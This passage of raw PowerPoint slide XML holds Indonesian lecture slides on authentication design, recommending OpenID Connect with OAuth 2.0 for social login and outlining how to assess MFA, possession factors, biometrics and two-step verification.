            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mobile apps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Most suitable choice:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>OpenID Connect (OIDC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OAuth 2.0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>social login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (Google, Facebook, GitHub).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Lightweight &amp; JSON-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>mobile &amp; web apps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibanding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAML.</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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11984562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Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyiapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MFA, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Kerberos SSO, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>federasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Panduan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Akses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengingat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, gateway VPN, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>multifaktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (MFA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Faktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OTP/fob dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OTP yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diinstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meliputi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sidik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keefektifan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> FAR, FRR, CER, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecepatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aksesibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
